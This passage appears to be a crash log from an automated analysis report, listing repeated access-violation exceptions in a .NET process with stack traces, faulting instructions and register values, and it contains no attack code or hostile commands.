40 28 ff 10 8b f8 8b 15 58 22 58 03 8b exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xafa631 registers.esp: 3993264 registers.edi: 45222780 registers.eax: 0 registers.ebp: 3993316 registers.edx: 4531928 registers.ebx: 45222844 registers.esi: 45222976 registers.ecx: 0	1
__exception__ Sept. 12, 2021, 3:11 p.m.	stacktrace: 0xaf60a5 0xaf2ac6 0xaf2a3f DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72322652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7233264f LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x723a1838 LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x723a1737 mscorlib+0x2d36ad @ 0x6ef536ad mscorlib+0x308f2d @ 0x6ef88f2d 0xaf097c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72322652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7233264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72332e95 CopyPDBs+0x4c45 DllCanUnloadNowInternal-0x3c392 clr+0x19a887 @ 0x724ba887 DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x723e7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72471dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72471e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72471f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7247416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73cef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73d67f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73d64de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 8b 01 8b 40 28 ff 10 8b f8 8b 15 58 22 58 03 8b exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xafa631 registers.esp: 3993264 registers.edi: 45222780 registers.eax: 0 registers.ebp: 3993316 registers.edx: 4531928 registers.ebx: 45222844 registers.esi: 45222976 registers.ecx: 0	1
__exception__ Sept. 12, 2021, 3:11 p.m.	stacktrace: 0xaf60a5 0xaf2ac6 0xaf2a3f DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72322652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7233264f LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x723a1838 LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x723a1737 mscorlib+0x2d36ad @ 0x6ef536ad mscorlib+0x308f2d @ 0x6ef88f2d 0xaf097c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72322652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7233264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72332e95 CopyPDBs+0x4c45 DllCanUnloadNowInternal-0x3c392 clr+0x19a887 @ 0x724ba887 DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x723e7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72471dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72471e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72471f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7247416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73cef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73d67f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73d64de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 8b 01 8b 40 28 ff 10 8b f8 8b 15 58 22 58 03 8b exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xafa631 registers.esp: 3993264 registers.edi: 45222780 registers.eax: 0 registers.ebp: 3993316 registers.edx: 4531928 registers.ebx: 45222844 registers.esi: 45222976 registers.ecx: 0	1
__exception__ Sept. 12, 2021, 3:11 p.m.	stacktrace: 0xaf60a5 0xaf2ac6 0xaf2a3f DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72322652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7233264f LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x723a1838 LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x723a1737 mscorlib+0x2d36ad @ 0x6ef536ad mscorlib+0x308f2d @ 0x6ef88f2d 0xaf097c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72322652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7233264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72332e95 CopyPDBs+0x4c45 DllCanUnloadNowInternal-0x3c392 clr+0x19a887 @ 0x724ba887 DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x723e7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72471dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72471e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72471f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7247416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73cef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73d67f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73d64de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 8b 01 8b 40 28 ff 10 8b f8 8b 15 58 22 58 03 8b exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xafa631 registers.esp: 3993264 registers.edi: 45222780 registers.eax: 0 registers.ebp: 3993316 registers.edx: 4531928 registers.ebx: 45222844 registers.esi: 45222976 registers.ecx: 0	1
__exception__ Sept. 12, 2021, 3:11 p.m.	stacktrace: 0xaf60a5 0xaf2ac6 0xaf2a3f DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72322652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7233264f LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x723a1838 LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x723a1737 mscorlib+0x2d36ad @ 0x6ef536ad mscorlib+0x308f2d @ 0x6ef88f2d 0xaf097c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72322652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7233264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72332e95 CopyPDBs+0x4c45 DllCanUnloadNowInternal-0x3c392 clr+0x19a887 @ 0x724ba887 DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x723e7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72471dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72471e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72471f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7247416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73cef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73d67f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73d64de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 8b 01 8b 40 28 ff 10 8b f8 8b 15 58 22 58 03 8b exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xafa631 registers.esp: 3993264 registers.edi: 45222780 registers.eax: 0 registers.ebp: 3993316 registers.edx: 4531928 registers.ebx: 45222844 registers.esi: 45222976 registers.ecx: 0	1
__exception__ Sept. 12, 2021, 3:11 p.m.	stacktrace: 0xaf60a5 0xaf2ac6 0xaf2a3f DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72322652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7233264f LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x723a1838 LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x723a1737 mscorlib+0x2d36ad @ 0x6ef536ad mscorlib+0x308f2d @ 0x6ef88f2d 0xaf097c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72322652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7233264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72332e95 CopyPDBs+0x4c45 DllCanUnloadNowInternal-0x3c392 clr+0x19a887 @ 0x724ba887 DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x723e7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72471dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72471e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72471f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7247416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73cef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73d67f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73d64de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 8b 01 8b 40 28 ff 10 8b f8 8b 15 58 22 58 03 8b exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xafa631 registers.esp: 3993264 registers.edi: 45222780 registers.eax: 0 registers.ebp: 3993316 registers.edx: 4531928 registers.ebx: 45222844 registers.esi: 45222976 registers.ecx: 0	1
__exception__ Sept. 12, 2021, 3:11 p.m.	stacktrace: 0xafbd1a 0xafbc60 0xafb6cd 0xaf3105 0xaf2a3f DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72322652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7233264f LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x723a1838 LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x723a1737 mscorlib+0x2d36ad @ 0x6ef536ad mscorlib+0x308f2d @ 0x6ef88f2d 0xaf097c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72322652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7233264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72332e95 CopyPDBs+0x4c45 DllCanUnloadNowInternal-0x3c392 clr+0x19a887 @ 0x724ba887 DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x723e7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72471dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72471e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72471f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7247416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73cef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73d67f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73d64de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 8b 40 04 89 45 d8 0f b6 45 dc 85 c0 0f 84 ef 00 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xafbf6a registers.esp: 3993064 registers.edi: 45691680 registers.eax: 0 registers.ebp: 3993112 registers.edx: 7036824 registers.ebx: 45689744 registers.esi: 45684956 registers.ecx: 17744000	1
__exception__ Sept. 12, 2021, 3:11 p.m.	stacktrace: 0xafbd1a 0xafbc60 0xafb6cd 0xaf3105 0xaf2a3f DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72322652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7233264f LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x723a1838 LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x723a1737 mscorlib+0x2d36ad @ 0x6ef536ad mscorlib+0x308f2d @ 0x6ef88f2d 0xaf097c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72322652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7233264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72332e95 CopyPDBs+0x4c45 DllCanUnloadNowInternal-0x3c392 clr+0x19a887 @ 0x724ba887 DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x723e7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72471dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72471e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72471f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7247416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73cef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73d67f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73d64de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 8b 40 04 89 45 d8 0f b6 45 dc 85 c0 0f 84 ef 00 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xafbf6a registers.esp: 3993064 registers.edi: 47077368 registers.eax: 0 registers.ebp: 3993112 registers.edx: 7036824 registers.ebx: 47075544 registers.esi: 45684956 registers.ecx: 17744000	1
__exception__ Sept. 12, 2021, 3:11 p.m.	stacktrace: 0xafbd1a 0xafbc60 0xafb6cd 0xaf3105 0xaf2a3f DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72322652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7233264f LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x723a1838 LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x723a1737 mscorlib+0x2d36ad @ 0x6ef536ad mscorlib+0x308f2d @ 0x6ef88f2d 0xaf097c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72322652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7233264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72332e95 CopyPDBs+0x4c45 DllCanUnloadNowInternal-0x3c392 clr+0x19a887 @ 0x724ba887 DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x723e7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72471dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72471e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72471f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7247416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73cef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73d67f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73d64de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 8b 40 04 89 45 d8 0f b6 45 dc 85 c0 0f 84 ef 00 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xafbf6a registers.esp: 3993064 registers.edi: 48438360 registers.eax: 0 registers.ebp: 3993112 registers.edx: 7036824 registers.ebx: 48436536 registers.esi: 45684956 registers.ecx: 17744000	1
__exception__ Sept. 12, 2021, 3:11 p.m.	stacktrace: 0x8461ef6 0x8461e48 0xafb75b 0xaf3105 0xaf2a3f DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72322652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7233264f LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x723a1838 LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x723a1737 mscorlib+0x2d36ad @ 0x6ef536ad mscorlib+0x308f2d @ 0x6ef88f2d 0xaf097c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72322652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7233264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72332e95 CopyPDBs+0x4c45 DllCanUnloadNowInternal-0x3c392 clr+0x19a887 @ 0x724ba887 DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x723e7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72471dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72471e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72471f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7247416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73cef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73d67f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73d64de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 8b 40 04 89 45 d8 0f b6 45 dc 85 c0 0f 84 ef 00 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xafbf6a registers.esp: 3993052 registers.edi: 40766640 registers.eax: 0 registers.ebp: 3993100 registers.edx: 7036824 registers.ebx: 40764828 registers.esi: 39689524 registers.ecx: 17744000	1
__exception__ Sept. 12, 2021, 3:11 p.m.	stacktrace: 0x8461ef6 0x8461e48 0xafb75b 0xaf3105 0xaf2a3f DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72322652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7233264f LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x723a1838 LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x723a1737 mscorlib+0x2d36ad @ 0x6ef536ad mscorlib+0x308f2d @ 0x6ef88f2d 0xaf097c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72322652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7233264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72332e95 CopyPDBs+0x4c45 DllCanUnloadNowInternal-0x3c392 clr+0x19a887 @ 0x724ba887 DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x723e7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72471dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72471e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72471f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7247416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73cef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73d67f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73d64de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 8b 40 04 89 45 d8 0f b6 45 dc 85 c0 0f 84 ef 00 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xafbf6a registers.esp: 3993052 registers.edi: 42137116 registers.eax: 0 registers.ebp: 3993100 registers.edx: 7036824 registers.ebx: 42135320 registers.esi: 39689524 registers.ecx: 17744000	1
__exception__ Sept. 12, 2021, 3:11 p.m.	stacktrace: 0x8461ef6 0x8461e48 0xafb75b 0xaf3105 0xaf2a3f DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72322652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7233264f LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x723a1838 LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x723a1737 mscorlib+0x2d36ad @ 0x6ef536ad mscorlib+0x308f2d @ 0x6ef88f2d 0xaf097c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72322652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7233264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72332e95 CopyPDBs+0x4c45 DllCanUnloadNowInternal-0x3c392 clr+0x19a887 @ 0x724ba887 DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x723e7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72471dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72471e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72471f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7247416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73cef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73d67f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73d64de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 8b 40 04 89 45 d8 0f b6 45 dc 85 c0 0f 84 ef 00 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xafbf6a registers.esp: 3993052 registers.edi: 43507592 registers.eax: 0 registers.ebp: 3993100 registers.edx: 7036824 registers.ebx: 43505796 registers.esi: 39689524 registers.ecx: 17744000	1
__exception__ Sept. 12, 2021, 3:11 p.m.	stacktrace: 0x8462437 0x8462388 0xafb7e9 0xaf3105 0xaf2a3f DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72322652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7233264f LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x723a1838 LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x723a1737 mscorlib+0x2d36ad @ 0x6ef536ad mscorlib+0x308f2d @ 0x6ef88f2d 0xaf097c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72322652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7233264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72332e95 CopyPDBs+0x4c45 DllCanUnloadNowInternal-0x3c392 clr+0x19a887 @ 0x724ba887 DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x723e7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72471dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72471e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72471f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7247416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73cef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73d67f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73d64de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 8b 40 04 89 45 d8 0f b6 45 dc 85 c0 0f 84 ef 00 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xafbf6a registers.esp: 3993064 registers.edi: 40205648 registers.eax: 0 registers.ebp: 3993112 